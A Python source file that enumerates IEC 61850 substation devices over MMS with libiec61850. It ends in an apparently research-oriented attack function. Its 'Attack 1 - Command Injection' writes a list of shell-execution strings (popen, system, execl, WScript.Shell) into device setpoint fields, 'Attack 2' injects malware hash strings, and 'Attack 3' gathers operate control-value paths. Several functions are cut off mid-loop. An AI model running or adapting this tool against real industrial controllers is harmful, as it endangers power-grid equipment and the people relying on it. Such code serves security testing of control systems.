def getLNlist_fromIED(ip): res_list = [] con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, ip, tcpPort) state = iec61850.IedConnection_getState(con) if (error == iec61850.IED_ERROR_OK): [deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con) device = iec61850.LinkedList_getNext(deviceList) size = iec61850.LinkedList_size(deviceList) while device: #Iterate over each device from deviceList [logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory( con, iec61850.toCharP(device.data)) lnode = iec61850.LinkedList_getNext(logicalNodes) while lnode: #Iterate over each node from LNodeList LN_name = iec61850.toCharP(lnode.data) res_list.append(LN_name) lnode = iec61850.LinkedList_getNext(lnode) iec61850.LinkedList_destroy(logicalNodes) device = iec61850.LinkedList_getNext(device) iec61850.LinkedList_destroy(deviceList) iec61850.IedConnection_close(con) else: print("Connection error") sys.exit(-1) iec61850.IedConnection_destroy(con) return res_list
def get_var_dict_fc_by_ied(self): var_dict = {} [deviceList, self.__error ] = iec61850.IedConnection_getLogicalDeviceList(self.__con) device = iec61850.LinkedList_getNext(deviceList) while device: ld_inst = iec61850.toCharP(device.data) [logicalNodes, self.__error] = iec61850.IedConnection_getLogicalDeviceDirectory( self.__con, iec61850.toCharP(device.data)) lnode = iec61850.LinkedList_getNext(logicalNodes) while lnode: ln_name = iec61850.toCharP(lnode.data) [variables, self.__error ] = iec61850.IedConnection_getLogicalNodeVariables( self.__con, ld_inst + '/' + ln_name) variable = iec61850.LinkedList_get(variables, 0) vIndex = 1 while variable: name = iec61850.toCharP(variable.data) fc_name = name.split("$", 1)[0] if '$' in name: var_name = name.split("$", 1)[1] var_name = var_name.replace("$", ".") #print(fc_name, "-----FC------>" , vIndex) var_dict[ld_inst + '/' + ln_name + '.' + var_name] = fc_name variable = iec61850.LinkedList_get(variables, vIndex) vIndex += 1 iec61850.LinkedList_destroy(variables) lnode = iec61850.LinkedList_getNext(lnode) iec61850.LinkedList_destroy(logicalNodes) device = iec61850.LinkedList_getNext(device) iec61850.LinkedList_destroy(deviceList) return var_dict
def get_ld_list(self): ld_list = [] [ldList, self.__error ] = iec61850.IedConnection_getLogicalDeviceList(self.__con) device = iec61850.LinkedList_getNext(ldList) while device: #Iterate over each device from deviceList ld_list.append(device) device = iec61850.LinkedList_getNext(device) #iec61850.LinkedList_destroy(ldList) return ld_list
def get_ied_ld_names(self): iednames = [] [deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(self.__con) device = iec61850.LinkedList_getNext(deviceList) while device: #Iterate over each device from deviceList iednames.append(iec61850.toCharP(device.data)) device = iec61850.LinkedList_getNext(device) iec61850.LinkedList_destroy(deviceList) return iednames
def main(): con = iec61850.IedConnection_create() err = iec61850.IedConnection_connect(con, "192.168.1.41", 102) [deviceList, err] = iec61850.IedConnection_getLogicalDeviceList(con) device = iec61850.LinkedList_getNext(deviceList) while device: print("LD: {}".format(iec61850.toCharP(device.data))) [LN, err] = iec61850.IedConnection_getLogicalDeviceDirectory( con, iec61850.toCharP(device.data)) device = iec61850.LinkedList_getNext(device) iec61850.LinkedList_destroy(deviceList)
def signal_handler(signal, frame): global running running =0 print('You pressed Ctrl+C!') if __name__=="__main__": now = datetime.now(); current_time = now.strftime("%H:%M:%S"); print("Starting Client At Time %s" % current_time); #Create Client Connection con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, "localhost", 8102); if (error == iec61850.IED_ERROR_OK): [deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con) device = iec61850.LinkedList_getNext(deviceList) print("Connected to Server.\n") #Show Logical Node, Logical Device and Data Object inside the Server while device: LD_name=iec61850.toCharP(device.data) print("LD: %s" % LD_name) [logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory(con, LD_name) logicalNode = iec61850.LinkedList_getNext(logicalNodes) while logicalNode: LN_name=iec61850.toCharP(logicalNode.data) print(" LN: %s" % LN_name) [LNobjects, error] = iec61850.IedConnection_getLogicalNodeVariables(con, LD_name+"/"+LN_name) LNobject = iec61850.LinkedList_getNext(LNobjects)
def main(host,port,attack,it,con): attack12 =[] visable_string_type =['$NamPlt','$NamPlt$d','$NamPlt$IdNs','$NamPlt$swRev','$NamPlt$vendor','LogRef','DatSet','RptID'] attack3 =[] commands= [ 'return execl (\"/bin/pwd\", \"pwd\", NULL);', 'system((\"/bin/pwd\", \"pwd\", NULL);', 'popen((\"/bin/pwd\", \"pwd\", NULL);', 'fp = popen(\"/bin/ls /etc/\", \"r\");printf(\'%s\',fp);', 'fp = system(\'ls\');printf(\'%s\',fp);', 'sshell ss; ss.argv.insert(\"ls\");o_(ss.link);', 'CALL \"SYSTEM\" USING BY CONTENT \"ls\"', 'Run(@ComSpec & \" /c \" & \'pause\', \"\", @SW_HIDE)', 'system(\"pause\");', 'execute_process(COMMAND ls)', 'spawn,\"ls\",result', 'System runCommand(\"ls\") stdout println', 'var sh = new ActiveXObject(\"WScript.Sh\");sh.run(\"/c ls\");', '\"ls\" system.', 'run(\`ls\`)', 'r: 4:\"ls\"', '> (io:format (os:cmd \"ls -alrt\"))', 'drive1$ = left$(Drives$,1) run \"ls /\";drive1$;\"', 'print first butfirst shell [ls -a] ; ..', 'contents=$(shell cat foo) curdir=\`pwd\`'] #https://rosettacode.org/wiki/Execute_a_system_command malware_examples=[ '414af3620d0843f07318a2a33f65667d', '0c8b4b357d4f059177ee752a2a3230a5', 'f16ea91bb744e4abf5b0424e2a7d9246', '902d64217c8a0968a7b24af3001abba5', 'e19167569032677bb8b8a8ce78af11f8', 'a787ba60426e50c77ac8cb0598b634af', 'b6c26bbaefdbabedfd71b537b1cd7586', 'cbf48f823c965b40b3cb1c31c9c51bf6', '465c25e393f2e15e337ce5ef817c839e', '7209054e29ea7ebfe0828b11609f0db0', '9f0bf21fd75f540dce7fc29da799cbe1', 'f4ecba48d00f3e86b7ff72bfccc03410', '417f692bf04685b1e282f2ea8d8933bb', '16ee94648fdb34280c838e522292070f', 'fe59c96c664cf49a857469fa4a37f646', '5fb781ff11297732851186f3f7ac4b6a', 'bf134af3a00189da424657a382913da5', '75b50a3fae06f054cf3f28d80cfa4e15', '71db409e39688340d0dffff94a012e2e', '3b3eaf98db1df32147aadccf66826025', '0199d9d68ec0af5819d6137feb04310e'] #Create Client Connection con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, host,port); if (error == iec61850.IED_ERROR_OK): [deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con) device = iec61850.LinkedList_getNext(deviceList) print("Connected to Server.\n") #Show Logical Node, Logical Device and Data Object inside the Server while device: logical_device=iec61850.toCharP(device.data) print("Name of Logical Device: %s" % logical_device) [logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory(con, logical_device) logicalNode = iec61850.LinkedList_getNext(logicalNodes) while logicalNode: LN_name=iec61850.toCharP(logicalNode.data) #print(" LN: %s" % LN_name) [LNobjects, error] = iec61850.IedConnection_getLogicalNodeVariables(con, logical_device+"/"+LN_name) LNobject = iec61850.LinkedList_getNext(LNobjects) while LNobject: #print(" DO: %s" % iec61850.toCharP(LNobject.data)) LNobject = iec61850.LinkedList_getNext(LNobject) try: #Attack1 and Attack2 if attack == 1 or attack == 2: for i in visable_string_type: if(str(iec61850.toCharP(LNobject.data)).endswith(i)): attack12.append(str(iec61850.toCharP(LNobject.data))) print(str(iec61850.toCharP(LNobject.data))) #Attack3 if attack == 3: if str(iec61850.toCharP(LNobject.data)).endswith('$Oper$ctlVal'): attack3.append(str(iec61850.toCharP(LNobject.data))) print(str(iec61850.toCharP(LNobject.data))) except (TypeError, AttributeError): pass iec61850.LinkedList_destroy(LNobjects) logicalNode = iec61850.LinkedList_getNext(logicalNode) iec61850.LinkedList_destroy(logicalNodes) device = iec61850.LinkedList_getNext(device) iec61850.LinkedList_destroy(deviceList) running = 1; signal.signal(signal.SIGINT, signal_handler); sp=[] ps_r=[] sp_w =[] while running: if attack == 1: count = 0 while count < it: count+=1 k = 0 for item in attack12: lln_param = logical_device+"/"+item type = iec61850.IEC61850_FC_SP #Function Code - Setpoint for c in commands: sp_w = iec61850.IedConnection_writeVisibleStringValue(con, lln_param, type, c) print(k,"- Working:",lln_param,c) time.sleep(0.1) k+=1 print("Finished Example Attack 1 - Command Injection") print("Attacked parameters:\n", attack12) break if attack == 2: count = 0 while count < it: count+=1 k = 0 for item in attack12: lln_param = logical_device+"/"+item type = iec61850.IEC61850_FC_SP #Function Code - Setpoint for m in malware_examples: sp_w = iec61850.IedConnection_writeVisibleStringValue(con, lln_param, type, m) print(k,"- Working:",lln_param,m) time.sleep(0.1) k+=1 print("Finished Example Attack 2 - Malware Injection") print("Attacked parameters:\n", attack12) break #MMS Structure if attack == 3: print("attack 3 ................") print(attack3) break